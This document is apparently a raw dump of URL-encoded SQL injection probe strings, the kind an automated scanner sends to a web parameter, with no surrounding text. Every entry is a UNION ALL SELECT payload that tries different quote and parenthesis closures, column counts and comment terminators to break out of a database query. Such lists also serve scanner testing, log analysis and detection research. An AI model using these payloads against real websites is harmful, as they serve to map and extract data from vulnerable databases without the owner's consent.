1234.5%27%20%2B%20%28SELECT%20%27UcDZ%27%20WHERE%209963%3D9963%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27NOfQ%27%20WHERE%204853%3D4853%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27FknQ%27%20WHERE%203607%3D3607%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27UwXJ%27%20WHERE%209821%3D9821%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27iePx%27%20WHERE%203214%3D3214%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 -5495%29%20UNION%20ALL%20SELECT%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242--%20 -8369%29%20UNION%20ALL%20SELECT%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590--%20 -4147%29%20UNION%20ALL%20SELECT%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468--%20 -8624%29%20UNION%20ALL%20SELECT%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630%2C%207630--%20 -9284%29%20UNION%20ALL%20SELECT%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893--%20 -6408%29%20UNION%20ALL%20SELECT%201580%2C%201580%2C%201580%2C%201580%2C%201580%2C%201580%2C%201580%2C%201580%2C%201580%2C%201580%2C%201580%2C%201580%2C%201580%2C%201580%2C%201580%2C%201580--%20 -4081%29%20UNION%20ALL%20SELECT%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676--%20 -5861%29%20UNION%20ALL%20SELECT%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635--%20 -3548%29%20UNION%20ALL%20SELECT%203475%2C%203475%2C%203475%2C%203475%2C%203475%2C%203475%2C%203475%2C%203475%2C%203475%2C%203475%2C%203475%2C%203475%2C%203475%2C%203475%2C%203475%2C%203475%2C%203475%2C%203475%2C%203475--%20 -3826%29%20UNION%20ALL%20SELECT%205993%2C%205993%2C%205993%2C%205993%2C%205993%2C%205993%2C%205993%2C%205993%2C%205993%2C%205993%2C%205993%2C%205993%2C%205993%2C%205993%2C%205993%2C%205993%2C%205993%2C%205993%2C%205993%2C%205993--%20 -6487%27%29%20UNION%20ALL%20SELECT%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933%2C%205933--%20 -6732%27%29%20UNION%20ALL%20SELECT%209312%2C%209312%2C%209312%2C%209312%2C%209312%2C%209312%2C%209312%2C%209312%2C%209312%2C%209312%2C%209312%2C%209312--%20 -2684%27%29%20UNION%20ALL%20SELECT%201528%2C%201528%2C%201528%2C%201528%2C%201528%2C%201528%2C%201528%2C%201528%2C%201528%2C%201528%2C%201528%2C%201528%2C%201528--%20 -4281%27%29%20UNION%20ALL%20SELECT%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112--%20 -5703%27%29%20UNION%20ALL%20SELECT%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838--%20 -8067%27%29%20UNION%20ALL%20SELECT%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399--%20 -5737%27%29%20UNION%20ALL%20SELECT%209541%2C%209541%2C%209541%2C%209541%2C%209541%2C%209541%2C%209541%2C%209541%2C%209541%2C%209541%2C%209541%2C%209541%2C%209541%2C%209541%2C%209541%2C%209541%2C%209541--%20 -6879%27%29%20UNION%20ALL%20SELECT%209100%2C%209100%2C%209100%2C%209100%2C%209100%2C%209100%2C%209100%2C%209100%2C%209100%2C%209100%2C%209100%2C%209100%2C%209100%2C%209100%2C%209100%2C%209100%2C%209100%2C%209100--%20 -6758%27%29%20UNION%20ALL%20SELECT%201809%2C%201809%2C%201809%2C%201809%2C%201809%2C%201809%2C%201809%2C%201809%2C%201809%2C%201809%2C%201809%2C%201809%2C%201809%2C%201809%2C%201809%2C%201809%2C%201809%2C%201809%2C%201809--%20 -5049%27%29%20UNION%20ALL%20SELECT%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995--%20 -9371%27%20UNION%20ALL%20SELECT%204852%2C%204852%2C%204852%2C%204852%2C%204852%2C%204852%2C%204852%2C%204852%2C%204852%2C%204852%2C%204852--%20 -2223%27%20UNION%20ALL%20SELECT%202847%2C%202847%2C%202847%2C%202847%2C%202847%2C%202847%2C%202847%2C%202847%2C%202847%2C%202847%2C%202847%2C%202847--%20 -3254%27%20UNION%20ALL%20SELECT%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161--%20 -1178%27%20UNION%20ALL%20SELECT%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757--%20 -1827%27%20UNION%20ALL%20SELECT%208803%2C%208803%2C%208803%2C%208803%2C%208803%2C%208803%2C%208803%2C%208803%2C%208803%2C%208803%2C%208803%2C%208803%2C%208803%2C%208803%2C%208803--%20 -4716%27%20UNION%20ALL%20SELECT%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095--%20 -5317%27%20UNION%20ALL%20SELECT%202916%2C%202916%2C%202916%2C%202916%2C%202916%2C%202916%2C%202916%2C%202916%2C%202916%2C%202916%2C%202916%2C%202916%2C%202916%2C%202916%2C%202916%2C%202916%2C%202916--%20 -8266%27%20UNION%20ALL%20SELECT%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204--%20 -9722%27%20UNION%20ALL%20SELECT%207083%2C%207083%2C%207083%2C%207083%2C%207083%2C%207083%2C%207083%2C%207083%2C%207083%2C%207083%2C%207083%2C%207083%2C%207083%2C%207083%2C%207083%2C%207083%2C%207083%2C%207083%2C%207083--%20 -9843%27%20UNION%20ALL%20SELECT%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583--%20 -8292%22%20UNION%20ALL%20SELECT%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092--%20 -9103%22%20UNION%20ALL%20SELECT%201506%2C%201506%2C%201506%2C%201506%2C%201506%2C%201506%2C%201506%2C%201506%2C%201506%2C%201506%2C%201506%2C%201506--%20 -5603%22%20UNION%20ALL%20SELECT%206481%2C%206481%2C%206481%2C%206481%2C%206481%2C%206481%2C%206481%2C%206481%2C%206481%2C%206481%2C%206481%2C%206481%2C%206481--%20 -1162%22%20UNION%20ALL%20SELECT%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029--%20 -6589%22%20UNION%20ALL%20SELECT%206165%2C%206165%2C%206165%2C%206165%2C%206165%2C%206165%2C%206165%2C%206165%2C%206165%2C%206165%2C%206165%2C%206165%2C%206165%2C%206165%2C%206165--%20 -9720%22%20UNION%20ALL%20SELECT%208460%2C%208460%2C%208460%2C%208460%2C%208460%2C%208460%2C%208460%2C%208460%2C%208460%2C%208460%2C%208460%2C%208460%2C%208460%2C%208460%2C%208460%2C%208460--%20 -5595%22%20UNION%20ALL%20SELECT%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619--%20 -1661%22%20UNION%20ALL%20SELECT%204316%2C%204316%2C%204316%2C%204316%2C%204316%2C%204316%2C%204316%2C%204316%2C%204316%2C%204316%2C%204316%2C%204316%2C%204316%2C%204316%2C%204316%2C%204316%2C%204316%2C%204316--%20 -7883%22%20UNION%20ALL%20SELECT%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964--%20 -8439%22%20UNION%20ALL%20SELECT%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028--%20 -4274%29%20UNION%20ALL%20SELECT%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555--%20%20AND%20%283776%3D3776 -2734%29%20UNION%20ALL%20SELECT%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808--%20%20AND%20%286714%3D6714 -6345%29%20UNION%20ALL%20SELECT%204619%2C%204619%2C%204619%2C%204619%2C%204619%2C%204619%2C%204619%2C%204619%2C%204619%2C%204619%2C%204619%2C%204619%2C%204619--%20%20AND%20%286499%3D6499 -6899%29%20UNION%20ALL%20SELECT%207754%2C%207754%2C%207754%2C%207754%2C%207754%2C%207754%2C%207754%2C%207754%2C%207754%2C%207754%2C%207754%2C%207754%2C%207754%2C%207754--%20%20AND%20%287270%3D7270 -5493%29%20UNION%20ALL%20SELECT%201468%2C%201468%2C%201468%2C%201468%2C%201468%2C%201468%2C%201468%2C%201468%2C%201468%2C%201468%2C%201468%2C%201468%2C%201468%2C%201468%2C%201468--%20%20AND%20%282145%3D2145 -6505%29%20UNION%20ALL%20SELECT%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588%2C%204588--%20%20AND%20%288342%3D8342 -6576%29%20UNION%20ALL%20SELECT%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929--%20%20AND%20%282112%3D2112 -2443%29%20UNION%20ALL%20SELECT%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917--%20%20AND%20%286240%3D6240 -7924%29%20UNION%20ALL%20SELECT%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878--%20%20AND%20%282451%3D2451 -7072%29%20UNION%20ALL%20SELECT%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987--%20%20AND%20%288770%3D8770 -9033%29%29%20UNION%20ALL%20SELECT%209823%2C%209823%2C%209823%2C%209823%2C%209823%2C%209823%2C%209823%2C%209823%2C%209823%2C%209823%2C%209823--%20%20AND%20%28%287703%3D7703 -2443%29%29%20UNION%20ALL%20SELECT%206915%2C%206915%2C%206915%2C%206915%2C%206915%2C%206915%2C%206915%2C%206915%2C%206915%2C%206915%2C%206915%2C%206915--%20%20AND%20%28%286472%3D6472 -7608%29%29%20UNION%20ALL%20SELECT%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230--%20%20AND%20%28%284691%3D4691 -8601%29%29%20UNION%20ALL%20SELECT%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791--%20%20AND%20%28%288858%3D8858 -9035%29%29%20UNION%20ALL%20SELECT%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784--%20%20AND%20%28%285342%3D5342 -5468%29%29%20UNION%20ALL%20SELECT%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123--%20%20AND%20%28%283626%3D3626 -4859%29%29%20UNION%20ALL%20SELECT%203240%2C%203240%2C%203240%2C%203240%2C%203240%2C%203240%2C%203240%2C%203240%2C%203240%2C%203240%2C%203240%2C%203240%2C%203240%2C%203240%2C%203240%2C%203240%2C%203240--%20%20AND%20%28%288015%3D8015 -2441%29%29%20UNION%20ALL%20SELECT%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976--%20%20AND%20%28%286828%3D6828 -1793%29%29%20UNION%20ALL%20SELECT%207653%2C%207653%2C%207653%2C%207653%2C%207653%2C%207653%2C%207653%2C%207653%2C%207653%2C%207653%2C%207653%2C%207653%2C%207653%2C%207653%2C%207653%2C%207653%2C%207653%2C%207653%2C%207653--%20%20AND%20%28%289037%3D9037 -3749%29%29%20UNION%20ALL%20SELECT%201020%2C%201020%2C%201020%2C%201020%2C%201020%2C%201020%2C%201020%2C%201020%2C%201020%2C%201020%2C%201020%2C%201020%2C%201020%2C%201020%2C%201020%2C%201020%2C%201020%2C%201020%2C%201020%2C%201020--%20%20AND%20%28%286257%3D6257 -9882%29%29%29%20UNION%20ALL%20SELECT%209967%2C%209967%2C%209967%2C%209967%2C%209967%2C%209967%2C%209967%2C%209967%2C%209967%2C%209967%2C%209967--%20%20AND%20%28%28%286991%3D6991 -2680%29%29%29%20UNION%20ALL%20SELECT%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584--%20%20AND%20%28%28%282462%3D2462 -7683%29%29%29%20UNION%20ALL%20SELECT%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599--%20%20AND%20%28%28%283549%3D3549 -8537%29%29%29%20UNION%20ALL%20SELECT%208716%2C%208716%2C%208716%2C%208716%2C%208716%2C%208716%2C%208716%2C%208716%2C%208716%2C%208716%2C%208716%2C%208716%2C%208716%2C%208716--%20%20AND%20%28%28%288519%3D8519 -8590%29%29%29%20UNION%20ALL%20SELECT%206686%2C%206686%2C%206686%2C%206686%2C%206686%2C%206686%2C%206686%2C%206686%2C%206686%2C%206686%2C%206686%2C%206686%2C%206686%2C%206686%2C%206686--%20%20AND%20%28%28%282552%3D2552 -6925%29%29%29%20UNION%20ALL%20SELECT%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518--%20%20AND%20%28%28%282462%3D2462 -1201%29%29%29%20UNION%20ALL%20SELECT%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168--%20%20AND%20%28%28%289139%3D9139 -8021%29%29%29%20UNION%20ALL%20SELECT%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585--%20%20AND%20%28%28%285212%3D5212 -3524%29%29%29%20UNION%20ALL%20SELECT%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965--%20%20AND%20%28%28%283925%3D3925 -7548%29%29%29%20UNION%20ALL%20SELECT%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168%2C%201168--%20%20AND%20%28%28%285904%3D5904 -5890%20UNION%20ALL%20SELECT%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004--%20 -9705%20UNION%20ALL%20SELECT%208665%2C%208665%2C%208665%2C%208665%2C%208665%2C%208665%2C%208665%2C%208665%2C%208665%2C%208665%2C%208665%2C%208665--%20 -4453%20UNION%20ALL%20SELECT%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016--%20 -2022%20UNION%20ALL%20SELECT%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434--%20 -8141%20UNION%20ALL%20SELECT%207565%2C%207565%2C%207565%2C%207565%2C%207565%2C%207565%2C%207565%2C%207565%2C%207565%2C%207565%2C%207565%2C%207565%2C%207565%2C%207565%2C%207565--%20 -7059%20UNION%20ALL%20SELECT%204601%2C%204601%2C%204601%2C%204601%2C%204601%2C%204601%2C%204601%2C%204601%2C%204601%2C%204601%2C%204601%2C%204601%2C%204601%2C%204601%2C%204601%2C%204601--%20 -9420%20UNION%20ALL%20SELECT%204716%2C%204716%2C%204716%2C%204716%2C%204716%2C%204716%2C%204716%2C%204716%2C%204716%2C%204716%2C%204716%2C%204716%2C%204716%2C%204716%2C%204716%2C%204716%2C%204716--%20 -6979%20UNION%20ALL%20SELECT%201688%2C%201688%2C%201688%2C%201688%2C%201688%2C%201688%2C%201688%2C%201688%2C%201688%2C%201688%2C%201688%2C%201688%2C%201688%2C%201688%2C%201688%2C%201688%2C%201688%2C%201688--%20 -1550%20UNION%20ALL%20SELECT%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526%2C%202526--%20 -1666%20UNION%20ALL%20SELECT%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020--%20 -6571%27%29%20UNION%20ALL%20SELECT%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343--%20%20AND%20%28%27wZxr%27%3D%27wZxr -8395%27%29%20UNION%20ALL%20SELECT%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389--%20%20AND%20%28%27yLaV%27%3D%27yLaV -9290%27%29%20UNION%20ALL%20SELECT%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049--%20%20AND%20%28%27Phvs%27%3D%27Phvs -4534%27%29%20UNION%20ALL%20SELECT%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825--%20%20AND%20%28%27DAqV%27%3D%27DAqV -5635%27%29%20UNION%20ALL%20SELECT%205652%2C%205652%2C%205652%2C%205652%2C%205652%2C%205652%2C%205652%2C%205652%2C%205652%2C%205652%2C%205652%2C%205652%2C%205652%2C%205652%2C%205652--%20%20AND%20%28%27PlxL%27%3D%27PlxL -5732%27%29%20UNION%20ALL%20SELECT%202468%2C%202468%2C%202468%2C%202468%2C%202468%2C%202468%2C%202468%2C%202468%2C%202468%2C%202468%2C%202468%2C%202468%2C%202468%2C%202468%2C%202468%2C%202468--%20%20AND%20%28%27vMYw%27%3D%27vMYw -4922%27%29%20UNION%20ALL%20SELECT%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879%2C%205879--%20%20AND%20%28%27fHlj%27%3D%27fHlj -4150%27%29%20UNION%20ALL%20SELECT%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867--%20%20AND%20%28%27Ffmr%27%3D%27Ffmr -3858%27%29%20UNION%20ALL%20SELECT%208726%2C%208726%2C%208726%2C%208726%2C%208726%2C%208726%2C%208726%2C%208726%2C%208726%2C%208726%2C%208726%2C%208726%2C%208726%2C%208726%2C%208726%2C%208726%2C%208726%2C%208726%2C%208726--%20%20AND%20%28%27OXHv%27%3D%27OXHv -4665%27%29%20UNION%20ALL%20SELECT%209429%2C%209429%2C%209429%2C%209429%2C%209429%2C%209429%2C%209429%2C%209429%2C%209429%2C%209429%2C%209429%2C%209429%2C%209429%2C%209429%2C%209429%2C%209429%2C%209429%2C%209429%2C%209429%2C%209429--%20%20AND%20%28%27kukQ%27%3D%27kukQ -1337%27%29%29%20UNION%20ALL%20SELECT%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697--%20%20AND%20%28%28%27GwJL%27%3D%27GwJL -7149%27%29%29%20UNION%20ALL%20SELECT%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254--%20%20AND%20%28%28%27KzCa%27%3D%27KzCa -5299%27%29%29%20UNION%20ALL%20SELECT%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854--%20%20AND%20%28%28%27lazj%27%3D%27lazj -8928%27%29%29%20UNION%20ALL%20SELECT%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053--%20%20AND%20%28%28%27eCuk%27%3D%27eCuk -4056%27%29%29%20UNION%20ALL%20SELECT%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326--%20%20AND%20%28%28%27ZIXk%27%3D%27ZIXk -6066%27%29%29%20UNION%20ALL%20SELECT%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480--%20%20AND%20%28%28%27kxyf%27%3D%27kxyf -2974%27%29%29%20UNION%20ALL%20SELECT%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827--%20%20AND%20%28%28%27EUNA%27%3D%27EUNA 